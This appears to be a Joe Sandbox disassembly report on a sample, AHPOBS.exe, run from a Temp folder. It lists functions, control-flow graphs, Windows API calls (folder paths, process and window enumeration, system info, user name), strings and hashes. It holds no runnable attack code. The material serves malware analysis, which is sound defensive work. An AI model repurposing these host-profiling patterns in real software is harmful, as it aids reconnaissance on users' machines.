                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                      • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                      Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1699 4720db-472131 call 412f40 * 2 1704 47213b-472151 call 41313c 1699->1704 1707 472153-472157 1704->1707 1708 472159-47215c 1704->1708 1707->1704 1707->1708 1709 4721d1-4721d4 1708->1709 1710 47215e-472191 call 401b10 call 40bd50 call 40c2c0 1708->1710 1712 472db4-472dc4 call 402250 1709->1712 1713 4721da 1709->1713 1794 472193-4721ad call 402250 * 2 1710->1794 1795 4721b0-4721ce call 408e80 call 402250 * 2 1710->1795 1716 472545-47255a SHGetFolderPathW 1713->1716 1717 472324-472366 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1717 1718 4724a1-4724da call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1718 1719 4723ae-4723f0 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1719 1720 4725ad-4725c2 SHGetFolderPathW 1713->1720 1721 47252b-472540 SHGetFolderPathW 1713->1721 1722 472369-4723ab call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1722 1723 4724f7-47250c SHGetFolderPathW 1713->1723 1724 472255-472dad call 403cc0 call 408f40 1713->1724 1725 472274-47229b call 403cc0 call 408e80 call 402250 1713->1725 1726 4723f3-472435 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1726 1727 472593-4725a8 SHGetFolderPathW 1713->1727 1728 472511-472526 SHGetFolderPathW 1713->1728 1729 4722df-472321 call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1729 1730 47255f-472574 SHGetFolderPathW 1713->1730 1731 47229e-4722b8 GetLocalTime 1713->1731 1732 47247d-47249c call 441e23 call 451b19 1713->1732 1733 4724dd-4724f2 SHGetFolderPathW 1713->1733 1734 472579-47258e SHGetFolderPathW 1713->1734 1735 472438-47247a call 441e23 call 451aa8 call 40e6a0 call 402250 * 2 1713->1735 1740 4722c1-4722dc call 40e710 call 402250 1716->1740 1720->1740 1721->1740 1723->1740 1724->1712 1727->1740 1728->1740 1730->1740 1742 4722b9-4722be call 41329b 1731->1742 1732->1742 1733->1740 1734->1740 1742->1740
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                      • __swprintf.LIBCMT ref: 004722B9
                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FolderPath$LocalTime__swprintf
                                      • String ID: %.3d
                                      • API String ID: 3337348382-986655627
                                      • Opcode ID: a58a57cd5ebc1ace6200ce5e5fba9a5da2eee674366265addf8639f2f8ddc892
                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                      • Opcode Fuzzy Hash: a58a57cd5ebc1ace6200ce5e5fba9a5da2eee674366265addf8639f2f8ddc892
                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                      Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2476 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2485 40e582-40e583 2476->2485 2486 427674-427679 2476->2486 2489 40e585-40e596 2485->2489 2490 40e5ba-40e5cb call 40ef60 2485->2490 2487 427683-427686 2486->2487 2488 42767b-427681 2486->2488 2492 427693-427696 2487->2492 2493 427688-427691 2487->2493 2491 4276b4-4276be 2488->2491 2494 427625-427629 2489->2494 2495 40e59c-40e59f 2489->2495 2507 40e5ec-40e60c 2490->2507 2508 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2490->2508 2509 4276c6-4276ca GetSystemInfo 2491->2509 2492->2491 2499 427698-4276a8 2492->2499 2493->2491 2501 427636-427640 2494->2501 2502 42762b-427631 2494->2502 2497 40e5a5-40e5ae 2495->2497 2498 427654-427657 2495->2498 2503 40e5b4 2497->2503 2504 427645-42764f 2497->2504 2498->2490 2510 42765d-42766f 2498->2510 2505 4276b0 2499->2505 2506 4276aa-4276ae 2499->2506 2501->2490 2502->2490 2503->2490 2504->2490 2505->2491 2506->2491 2512 40e612-40e623 call 40efd0 2507->2512 2513 4276d5-4276df GetSystemInfo 2507->2513 2508->2507 2520 40e5e8 2508->2520 2509->2513 2510->2490 2512->2509 2517 40e629-40e63f call 40ef90 GetNativeSystemInfo 2512->2517 2522 40e641-40e642 FreeLibrary 2517->2522 2523 40e644-40e651 2517->2523 2520->2507 2522->2523 2524 40e653-40e654 FreeLibrary 2523->2524 2525 40e656-40e65d 2523->2525 2524->2525
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                      • GetNativeSystemInfo.KERNEL32(?), ref: 0040E632
                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                      • String ID: 0SH
                                      • API String ID: 3363477735-851180471
                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                      Function 00433EE0 Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                      • __wsplitpath.LIBCMT ref: 00433F63
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00433F76
                                      • __wcsicoll.LIBCMT ref: 00433F86
                                      • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 2547909840-0
                                      • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                      • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                      • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                      • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                      Function 0046CEF3 Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0046CF63
                                      • _wcslen.LIBCMT ref: 0046CF75
                                      • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
                                      • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
                                      • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                      • String ID:
                                      • API String ID: 2728119192-0
                                      • Opcode ID: f61fbbea4972f354fdf485375051132769b1db82ff0cc1c8953d76aaf66a3e14
                                      • Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
                                      • Opcode Fuzzy Hash: f61fbbea4972f354fdf485375051132769b1db82ff0cc1c8953d76aaf66a3e14
                                      • Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
                                      Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                      Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: e1f8f42dac8fc42dc827f7d1906d4f9b69e2e30a543b0124fa5ca55585ac3181
                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                      • Opcode Fuzzy Hash: e1f8f42dac8fc42dc827f7d1906d4f9b69e2e30a543b0124fa5ca55585ac3181
                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                      Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchSleepTranslate
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                      • API String ID: 1762048999-758534266
                                      • Opcode ID: e0a738ed18a84ae3c3d14462e01dda1d2b106cb947bd4ad1d5a6f69c5601ad0e
                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                      • Opcode Fuzzy Hash: e0a738ed18a84ae3c3d14462e01dda1d2b106cb947bd4ad1d5a6f69c5601ad0e
                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                      Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00433A26
                                      • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000), ref: 00433A4E
                                      • _wcslen.LIBCMT ref: 00433A55
                                      • _wcscpy.LIBCMT ref: 00433A7B
                                      • _wcscat.LIBCMT ref: 00433A9C
                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
                                      • _wcscat.LIBCMT ref: 00433B0E
                                      • _wcscat.LIBCMT ref: 00433B15
                                      • __wcsicoll.LIBCMT ref: 00433B2F
                                      • _wcsncpy.LIBCMT ref: 00433B45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1503153545-1459072770
                                      • Opcode ID: d9605bc14267efd8b064930ad84d4b7d3473b5546fca9efa33410ce2d7d06cc4
                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                      • Opcode Fuzzy Hash: d9605bc14267efd8b064930ad84d4b7d3473b5546fca9efa33410ce2d7d06cc4
                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                      Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1295 46ed8e-46ee39 call 4109e0 * 2 call 40e0a0 * 2 call 402160 call 40bc70 * 3 1312 46ee4a-46ee4e 1295->1312 1313 46ee3b-46ee47 call 4152bb 1295->1313 1315 46ee50-46ee5a call 469296 1312->1315 1316 46ee61-46ee6d call 436565 1312->1316 1313->1312 1315->1316 1322 46eec5-46eed7 call 401c90 1316->1322 1323 46ee6f-46ee77 call 436565 1316->1323 1328 46eedd-46eeec call 401c90 1322->1328 1329 46f2f9-46f305 call 436565 1322->1329 1323->1322 1330 46ee79-46ee81 GetForegroundWindow call 44cdaf 1323->1330 1328->1329 1337 46eef2-46eefd 1328->1337 1339 46f307-46f310 call 40e0a0 1329->1339 1340 46f315-46f319 1329->1340 1334 46ee86-46eec2 call 436299 call 402250 * 3 1330->1334 1341 46ef00-46ef1c call 461a5b 1337->1341 1339->1340 1344 46f322-46f32a 1340->1344 1345 46f31b 1340->1345 1341->1329 1356 46ef22-46ef36 call 445ae0 1341->1356 1348 46f335-46f339 1344->1348 1349 46f32c-46f330 call 410bc0 1344->1349 1345->1344 1351 46f34a-46f354 1348->1351 1352 46f33b-46f33f 1348->1352 1349->1348 1357 46f356-46f363 GetDesktopWindow EnumChildWindows 1351->1357 1358 46f365 EnumWindows 1351->1358 1352->1351 1355 46f341-46f345 call 410bc0 1352->1355 1355->1351 1367 46f1f5-46f209 call 445ae0 1356->1367 1368 46ef3c-46ef50 call 445ae0 1356->1368 1362 46f36b-46f385 call 4457df call 4109e0 1357->1362 1358->1362 1381 46f387-46f390 call 44cdaf 1362->1381 1382 46f395-46f3be call 402250 * 3 1362->1382 1377 46f1ce-46f1f2 call 402250 * 3 1367->1377 1378 46f20b-46f20f 1367->1378 1379 46ef56-46ef6a call 445ae0 1368->1379 1380 46f24b-46f25f call 445ae0 1368->1380 1384 46f225-46f248 call 402250 * 3 1378->1384 1385 46f211-46f21f 1378->1385 1399 46f283-46f2a2 call 432c30 IsWindow 1379->1399 1400 46ef70-46ef84 call 445ae0 1379->1400 1380->1377 1395 46f265-46f26b GetForegroundWindow 1380->1395 1381->1382 1385->1384 1401 46f26c-46f27a call 44cdaf 1395->1401 1399->1384 1417 46f2a4-46f2a5 1399->1417 1413 46ef86-46ef8b 1400->1413 1414 46efe1-46eff5 call 445ae0 1400->1414 1401->1399 1420 46f2a7-46f2cd call 402250 * 3 1413->1420 1421 46ef91-46efa8 call 401070 1413->1421 1427 46eff7-46f009 call 40e0a0 1414->1427 1428 46f00e-46f022 call 445ae0 1414->1428 1417->1401 1432 46efa9-46efb2 call 46906d 1421->1432 1427->1341 1440 46f024-46f03a call 401070 1428->1440 1441 46f03f-46f053 call 445ae0 1428->1441 1432->1341 1443 46efb8-46efde call 402250 * 3 1432->1443 1440->1432 1451 46f074-46f088 call 445ae0 1441->1451 1452 46f055-46f06f call 413190 1441->1452 1459 46f08a-46f0a4 call 413190 1451->1459 1460 46f0a9-46f0bd call 445ae0 1451->1460 1452->1341 1459->1341 1467 46f0de-46f0f2 call 445ae0 1460->1467 1468 46f0bf-46f0d9 call 413190 1460->1468 1473 46f0f4-46f10e call 413190 1467->1473 1474 46f113-46f127 call 445ae0 1467->1474 1468->1341 1473->1341 1479 46f145-46f159 call 445ae0 1474->1479 1480 46f129-46f140 call 413190 1474->1480 1485 46f17a-46f18e call 445ae0 1479->1485 1486 46f15b-46f16f call 445ae0 1479->1486 1480->1341 1491 46f1b4-46f1c8 call 44cd93 1485->1491 1492 46f190-46f195 1485->1492 1486->1377 1493 46f171-46f175 1486->1493 1491->1341 1491->1377 1494 46f2d0-46f2f6 call 402250 * 3 1492->1494 1495 46f19b-46f1af call 40e0a0 1492->1495 1493->1341 1495->1341
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                      • IsWindow.USER32(?), ref: 0046F29A
                                      • GetDesktopWindow.USER32 ref: 0046F356
                                      • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                      • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 329138477-1919597938
                                      • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                      • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                      • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                      • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                      Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • __wcsicoll.LIBCMT ref: 00402007
                                      • __wcsicoll.LIBCMT ref: 0040201D
                                      • __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
